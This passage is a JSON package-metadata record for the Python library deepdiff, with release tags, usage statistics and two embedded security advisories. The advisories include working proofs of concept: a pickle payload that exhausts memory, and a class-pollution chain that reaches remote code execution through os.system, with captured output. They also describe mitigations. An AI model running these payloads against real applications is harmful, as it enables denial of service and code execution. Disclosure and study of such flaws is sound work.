ar.gz/v2.1.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"fc836f7a0a7afe4d07220fe33c97e30f792a29ba","kind":"tag","published_at":"2016-08-08T08:22:07.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.1.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.0/manifests"},{"name":"v1.5.0","sha":"f021f517e52d4230d245cb6d1b994c2184f02e6a","kind":"tag","published_at":"2016-07-02T01:40:54.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v1.5.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.5.0/manifests"},{"name":"v1.2.0","sha":"b9ce621ad237842b762e178c2fdd70042f235de8","kind":"tag","published_at":"2016-06-12T02:19:38.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v1.2.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.2.0/manifests"},{"name":"v1.0.1","sha":"8d1267e9df7faf439eea0662be493a333b40beda","kind":"tag","published_at":"2016-03-15T20:49:45.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v1.0.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.0.1/manifests"},{"name":"v0.6.1","sha":"10c0debca3649ff9a4ac2fffea7fad596e5e97a0","kind":"tag","published_at":"2015-12-14T00:36:11.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v0.6.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.6.1/manifests"},{"name":"v0.5.6","sha":"3f09562b6e78facb7bac82dbbe9dbcb0b9e22768","kind":"tag","published_at":"2015-08-11T23:12:36.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v0.5.6","html_url":"https://github.com/seperman/deepdiff/releases/tag/v0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.5.6/manifests"},{"name":"v0.5.5","sha":"6e92f46827739b5517cc47b24cc16f672805a669","kind":"tag","published_at":"2015-07-26T07:58:25.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v0.5.5","html_url":"https://github.com/seperman/deepdiff/releases/tag/v0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.5.5/manifests"}]},"repo_metadata_updated_at":"2024-09-08T01:57:42.517Z","dependent_packages_count":378,"downloads":78190666,"downloads_period":"last-month","dependent_repos_count":2058,"rankings":{"downloads":0.06687524905605291,"dependent_repos_count":0.24354141585584874,"dependent_packages_count":0.0718387968975113,"stargazers_count":1.646970623631306,"forks_count":3.6515717935313323,"docker_downloads_count":0.08289091949712842,"average":0.9606147997448633},"purl":"pkg:pypi/deepdiff","advisories":[{"uuid":"GSA_kwCzR0hTQS01NGpqLXB4OHgtNXc1cc4ABT1J","url":"https://github.com/advisories/GHSA-54jj-px8x-5w5q","title":"DeepDiff has Memory Exhaustion DoS through SAFE_TO_IMPORT","description":"### Summary\n\nThe pickle unpickler `_RestrictedUnpickler` validates which classes can be loaded but does not limit their constructor arguments. A few of the types in `SAFE_TO_IMPORT` have constructors that allocate memory proportional to their input (`builtins.bytes`, `builtins.list`, `builtins.range`). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call `pickle_load` with untrusted data.\n\n### Details\n\nCVE-2025-58367 hardened the delta class against pollution and remote code execution by converting `SAFE_TO_IMPORT` to a `frozenset` and blocking traversal. `_RestrictedUnpickler.find_class` only gates which classes can be loaded. It doesn't intercept `REDUCE` opcodes or validate what is passed to constructors.\n\nIt can be exploited in 2 ways.\n\n**1 - During `pickle_load`**\n\nA pickle that calls `bytes(N)` using opcodes permitted by the allowlist. The allocation happens during deserialization and before the delta processes anything. The restricted unpickler does not override `load_reduce` so any allowed class can be called.\n\n```\nGLOBAL builtins.bytes      (passes find_class check — serialization.py:353)\nINT    10000000000          (10 billion)\nTUPLE + REDUCE             → bytes(10**10) → allocates ~9.3 GB\n```\n\n**2 - During delta application**\n\nA valid diff dict that first sets a value to a large int via `values_changed`, then converts it to bytes via `type_changes`. It works because `_do_values_changed()` runs before `_do_type_changes()` in `Delta.add()` in `delta.py` line 183. Step 1 modifies the target in place before step 2 reads the modified value and calls `new_type(current_old_value)` at `delta.py` line 576 with no size guard.\n\n### PoC\n\nThe script uses Python's `resource` module to cap memory to 1 GB so you can reproduce safely without hitting the OOM killer. It loads deepdiff first, applies the limit, then runs the payload. Change `10**8` to `10**10` for the full 9.3 GB allocation.\n\n```python\nimport resource\nimport sys\n\ndef limit_memory(maxsize_mb):\n    \"\"\"Cap virtual memory for this process.\"\"\"\n    soft, hard = resource.getrlimit(resource.RLIMIT_AS)\n    maxsize_bytes = maxsize_mb * 1024 * 1024\n    try:\n        resource.setrlimit(resource.RLIMIT_AS, (maxsize_bytes, hard))\n        print(f\"[*] Memory limit set to {maxsize_mb} MB\")\n    except ValueError:\n        print(\"[!] Failed to set memory limit.\")\n        sys.exit(1)\n\n# Load heavy imports before enforcing the limit\nfrom deepdiff import Delta\nfrom deepdiff.serialization import pickle_dump, pickle_load\n\nlimit_memory(1024)\n\n# --- Delta application path ---\npayload_dict = {\n    'values_changed': {\"root['x']\": {'new_value': 10**8}},\n    'type_changes': {\"root['x']\": {'new_type': bytes}},\n}\n\npayload1 = pickle_dump(payload_dict)\nprint(f\"Payload size: {len(payload1)} bytes\")\n\ntarget = {'x': 'anything'}\ntry:\n    result = target + Delta(payload1)\n    print(f\"Allocated: {len(result['x']) // 1024 // 1024} MB\")\n    print(f\"Amplification: {len(result['x']) // len(payload1)}x\")\nexcept MemoryError:\n    print(\"[!] MemoryError — payload tried to allocate too much\")\n\n# --- Raw pickle path ---\npayload2 = (\n    b\"(dp0\\n\"\n    b\"S'_'\\n\"\n    b\"cbuiltins\\nbytes\\n\"\n    b\"(I100000000\\n\"\n    b\"tR\"\n    b\"s.\"\n)\n\nprint(f\"Payload size: {len(payload2)} bytes\")\ntry:\n    result2 = pickle_load(payload2)\n    print(f\"Allocated: {len(result2['_']) // 1024 // 1024} MB\")\nexcept MemoryError:\n    print(\"[!] MemoryError — payload tried to allocate too much\")\n```\n\nOutput:\n```\n[*] Memory limit set to 1024 MB\nPayload size: 123 bytes\nAllocated: 95 MB\nAmplification: 813008x\nPayload size: 42 bytes\nAllocated: 95 MB\n```\n\n### Impact\n\nDenial of service. Any application that deserializes delta objects or calls `pickle_load` with untrusted inputs can be crashed with a small payload. The restricted unpickler is meant to make this safe. It prevents remote code execution but doesn't prevent resource exhaustion.\n\nThe amplification is large. 800,000x for delta and 2,000,000x for raw pickle.\n\nImpacted users are anyone who accepts serialized delta objects from untrusted sources — network APIs, file uploads, message queues, etc.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-18T20:10:08.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q","https://nvd.nist.gov/vuln/detail/CVE-2026-33155","https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb","https://github.com/advisories/GHSA-54jj-px8x-5w5q"],"source_kind":"github","identifiers":["GHSA-54jj-px8x-5w5q","CVE-2026-33155"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-18T21:00:11.195Z","updated_at":"2026-04-18T03:00:45.880Z","epss_percentage":0.00052,"epss_percentile":0.16324,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NGpqLXB4OHgtNXc1cc4ABT1J","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01NGpqLXB4OHgtNXc1cc4ABT1J","packages":[{"ecosystem":"pypi","package_name":"deepdiff","versions":[{"first_patched_version":"8.6.2","vulnerable_version_range":"\u003e= 5.0.0, \u003c= 8.6.1"}],"purl":"pkg:pypi/deepdiff"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NGpqLXB4OHgtNXc1cc4ABT1J/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tdzI2LTVnMnYtaHF3M84ABLo2","url":"https://github.com/advisories/GHSA-mw26-5g2v-hqw3","title":"DeepDiff Class Pollution in Delta class leading to DoS, Remote Code Execution, and more","description":"### Summary\n[Python class pollution](https://blog.abdulrah33m.com/prototype-pollution-in-python/) is a novel vulnerability categorized under [CWE-915](https://cwe.mitre.org/data/definitions/915.html). The `Delta` class is vulnerable to class pollution via its constructor, and when combined with a gadget available in DeltaDiff itself, it can lead to Denial of Service and Remote Code Execution (via insecure [Pickle](https://docs.python.org/3/library/pickle.html) deserialization).\n\nThe gadget available in DeepDiff allows `deepdiff.serialization.SAFE_TO_IMPORT` to be modified to allow dangerous classes such as `posix.system`, and then perform insecure Pickle deserialization via the Delta class. This potentially allows any Python code to be executed, given that the input to `Delta` is user-controlled.\n\nDepending on the application where DeepDiff is used, this can also lead to other vulnerabilities. For example, in a web application, it might be possible to bypass authentication via class pollution.\n\n### Details\n\nThe `Delta` class can take different object types as a parameter in its constructor, such as a `DeltaDiff` object, a dictionary, or even just bytes (that are deserialized via Pickle).\n\nWhen it takes a dictionary, it is usually in the following format:\n```py\nDelta({\"dictionary_item_added\": {\"root.myattr['foo']\": \"bar\"}})\n```\n\nTrying to apply class pollution here does not work, because there is already a filter in place: https://github.com/seperman/deepdiff/blob/b639fece73fe3ce4120261fdcff3cc7b826776e3/deepdiff/path.py#L23\n\nHowever, this code only runs when parsing the path from a string.\nThe `_path_to_elements` function helpfully returns the given input if it is already a list/tuple:\nhttps://github.com/seperman/deepdiff/blob/b639fece73fe3ce4120261fdcff3cc7b826776e3/deepdiff/path.py#L52-L53\n\nThis means that it is possible to pass the path as the internal representation used by Delta, bypassing the filter:\n\n```py\nDelta(\n    {\n        \"dictionary_item_added\": {\n            (\n                (\"root\", \"GETATTR\"),\n                (\"__init__\", \"GETATTR\"),\n                (\"__globals__\", \"GETATTR\"),\n                (\"PWNED\", \"GET\"),\n            ): 1337\n        }\n    },\n)\n```\n\nGoing back to the possible inputs of `Delta`, when it takes a `bytes` as input, it uses pickle to deserialize them.\nCare was taken by DeepDiff to prevent arbitrary code execution via the `SAFE_TO_IMPORT` allow list.\nhttps://github.com/seperman/deepdiff/blob/b639fece73fe3ce4120261fdcff3cc7b826776e3/deepdiff/serialization.py#L62-L98\nHowever, using the class pollution in the `Delta`, an attacker can add new entries to this `set`.\n\nThis then allows a second call to `Delta` to [unpickle an insecure class](https://davidhamann.de/2020/04/05/exploiting-python-pickle/) that runs `os.system`, for example.\n\n#### Using dict\n\nUsually, class pollution [does not work](https://gist.github.com/CalumHutton/45d33e9ea55bf4953b3b31c84703dfca#technical-details) when traversal starts at a `dict`/`list`/`tuple`, because it is not possible to reach `__globals__` from there.\nHowever, using two calls to `Delta` (or just one call if the target dictionary that already contains at least one entry) it is possible to first change one entry of the dictionary to be of type `deepdiff.helper.Opcode`, which then allows traversal to `__globals__`, and notably `sys.modules`, which in turn allows traversal to any module already loaded by Python.\nPassing `Opcode` around can be done via pickle, which `Delta` will happily accept given it is in the default allow list.\n\n### Proof of Concept\n\nWith deepdiff 8.6.0 installed, run the following scripts for each proof of concept.\nAll input to `Delta` is assumed to be user-controlled.\n\n#### Denial of Service\n\nThis script will pollute the value of `builtins.int`, preventing the class from being used and making code crash whenever invoked.\n\n```py\n# ------------[ Setup ]------------\nimport pickle\n\nfrom deepdiff.helper import Opcode\n\npollute_int = pickle.dumps(\n    {\n        \"values_changed\": {\"root['tmp']\": {\"new_value\": Opcode(\"\", 0, 0, 0, 0)}},\n        \"dictionary_item_added\": {\n            (\n                (\"root\", \"GETATTR\"),\n                (\"tmp\", \"GET\"),\n                (\"__repr__\", \"GETATTR\"),\n                (\"__globals__\", \"GETATTR\"),\n                (\"__builtins__\", \"GET\"),\n                (\"int\", \"GET\"),\n            ): \"no longer a class\"\n        },\n    }\n)\n\n\nassert isinstance(pollute_int, bytes)\n\n# ------------[ Exploit ]------------\n# This could be some example, vulnerable, application.\n# The inputs above could be sent via HTTP, for example.\n\nfrom deepdiff import Delta\n\n# Existing dictionary; it is assumed that it contains\n# at least one entry, otherwise a different Delta needs to be\n# applied first, adding an entry to the dictionary.\nmydict = {\"tmp\": \"foobar\"}\n\n# Before pollution\nprint(int(\"41\") + 1)\n\n# Apply Delta to mydict\nresult = mydict + Delta(pollute_int)\n\nprint(int(\"1337\"))\n```\n\n```shell\n$ python poc_dos.py\n42\nTraceback (most recent call last):\n  File \"/tmp/poc_dos.py\", line 43, in \u003cmodule\u003e\n    print(int(\"1337\"))\nTypeError: 'str' object is not callable\n```\n\n#### Remote Code Execution\n\nThis script will create a file at `/tmp/pwned` with the output of `id`.\n\n```py\n# ------------[ Setup ]------------\nimport os\nimport pickle\n\nfrom deepdiff.helper import Opcode\n\npollute_safe_to_import = pickle.dumps(\n    {\n        \"values_changed\": {\"root['tmp']\": {\"new_value\": Opcode(\"\", 0, 0, 0, 0)}},\n        \"set_item_added\": {\n            (\n                (\"root\", \"GETATTR\"),\n                (\"tmp\", \"GET\"),\n                (\"__repr__\", \"GETATTR\"),\n                (\"__globals__\", \"GETATTR\"),\n                (\"sys\", \"GET\"),\n                (\"modules\", \"GETATTR\"),\n                (\"deepdiff.serialization\", \"GET\"),\n                (\"SAFE_TO_IMPORT\", \"GETATTR\"),\n            ): set([\"posix.system\"])\n        },\n    }\n)\n\n\n# From https://davidhamann.de/2020/04/05/exploiting-python-pickle/\nclass RCE:\n    def __reduce__(self):\n        cmd = \"id \u003e /tmp/pwned\"\n        return os.system, (cmd,)\n\n\n# Wrap object with dictionary so that Delta does not crash\nrce_pickle = pickle.dumps({\"_\": RCE()})\n\nassert isinstance(pollute_safe_to_import, bytes)\nassert isinstance(rce_pickle, bytes)\n\n# ------------[ Exploit ]------------\n# This could be some example, vulnerable, application.\n# The inputs above could be sent via HTTP, for example.\n\nfrom deepdiff import Delta\n\n# Existing dictionary; it is assumed that it contains\n# at least one entry, otherwise a different Delta needs to be\n# applied first, adding an entry to the dictionary.\nmydict = {\"tmp\": \"foobar\"}\n\n# Apply Delta to mydict\nresult = mydict + Delta(pollute_safe_to_import)\n\nDelta(rce_pickle)  # no need to apply this Delta\n```\n\n```shell\n$ python poc_rce.py\n$ cat /tmp/pwned\nuid=1000(dtc) gid=100(users) groups=100(users),1(wheel)\n```\n\n### Who is affected?\n\nOnly applications that pass (untrusted) user input directly into `Delta` are affected.\n\nWhile input in the form of `bytes` is the most flexible, there are certainly other gadgets, depending on the application, that can be used via just a dictionary. This dictionary could easily be parsed, for example, from JSON. One simple example would be overriding `app.secret_key` of a Flask application, which would allow an attacker to sign arbitrary cookies, leading to an authentication bypass.\n\n### Mitigations\n\nA straightforward mitigation is preventing traversal through private keys, like it is already done in the path parser.\nThis would have to be implemented in both `deepdiff.path._get_nested_obj` and `deepdiff.path._get_nested_obj_and_force`,\nand possibly in `deepdiff.delta.Delta._get_elements_and_details`.\nExample code that raises an error when traversing these properties:\n```py\nif elem.startswith(\"__\") and elem.endswith(\"__\"):\n  raise ValueError(\"traversing dunder attributes is not allowed\")\n```\n\nHowever, if it is desirable to still support attributes starting and ending with `__`, but still protect against this vulnerability, it is possible to only forbid `__globals__` and `__builtins__`, which stops the most serious cases of class pollution (but not all).\nThis was the solution adopted by pydash: https://github.com/dgilland/pydash/issues/180","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-09-03T22:25:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":10.0,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H","references":["https://github.com/seperman/deepdiff/security/advisories/GHSA-mw26-5g2v-hqw3","https://github.com/dgilland/pydash/issues/180","https://github.com/dgilland/pydash/commit/2015f0a4bcdbc3a5b27652e38fe97b3ee13ac15f","https://nvd.nist.gov/vuln/detail/CVE-2025-58367","https://github.com/seperman/deepdiff/commit/c69c06c13f75e849c770ade3f556cd16209fd183","https://github.com/seperman/deepdiff/releases/tag/8.6.1","https://github.com/advisories/GHSA-mw26-5g2v-hqw3"],"source_kind":"github","identifiers":["GHSA-mw26-5g2v-hqw3","CVE-2025-58367"],"repository_url":"https://github.com/seperman/deepdiff","blast_radius":33.13445370426414,"created_at":"2025-09-03T23:08:30.198Z","updated_at":"2026-04-18T03:02:11.321Z","epss_percentage":0.0019,"epss_percentile":0.40984,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tdzI2LTVnMnYtaHF3M84ABLo2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tdzI2LTVnMnYtaHF3M84ABLo2","packages":[{"ecosystem":"pypi","package_name":"deepdiff","versions":[{"first_patched_version":"8.6.1","vulnerable_version_range":"\u003e= 5.0.0, \u003c= 8.6.0"}],"purl":"pkg:pypi/deepdiff"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tdzI2LTVnMnYtaHF3M84ABLo2/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/deepdiff","docker_dependents_count":538,"docker_downloads_count":817048902,"usage_url":"https://repos.ecosyste.ms/usage/pypi/deepdiff","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/deepdiff/dependencies","status":null,"funding_links":["https://github.com/sponsors/seperman","https://ko-fi.com/seperman"],"critical":true,"issue_metadata":{"last_synced_at":"2024-09-07T03:10:12.096Z","issues_count":136,"pull_requests_count":65,"avg_time_to_close_issue":9239475.119565217,"avg_time_to_close_pull_request":1260139.796875,"issues_closed_count":92,"pull_requests_closed_count":64,"pull_request_authors_count":32,"issue_authors_count":117,"avg_comments_per_issue":2.948529411764706,"avg_comments_per_pull_request":2.0307692307692307,"merged_pull_requests_count":53,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":47,"past_year_pull_requests_count":28,"past_year_avg_time_to_close_issue":3162591.53125,"past_year_avg_time_to_close_pull_request":907900.1481481482,"past_year_issues_closed_count":32,"past_year_pull_requests_closed_count":27,"past_year_pull_request_authors_count":14,"past_year_issue_authors_count":36,"past_year_avg_comments_per_issue":1.8297872340425532,"past_year_avg_comments_per_pull_request":1.6785714285714286,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":22,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/issues","maintainers":[{"login":"seperman","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/seperman"}],"active_maintainers":[{"login":"seperman","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/seperman"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/codemeta","maintainers":[{"uuid":"seperman","login":"seperman","name":null,"email":null,"url":null,"packages_count":6,"html_url":"https://pypi.org/user/seperman/","role":null,"created_at":"2022-11-14T21:11:15.001Z","updated_at":"2022-11-14T21:11:15.001Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/seperman/packages"}]}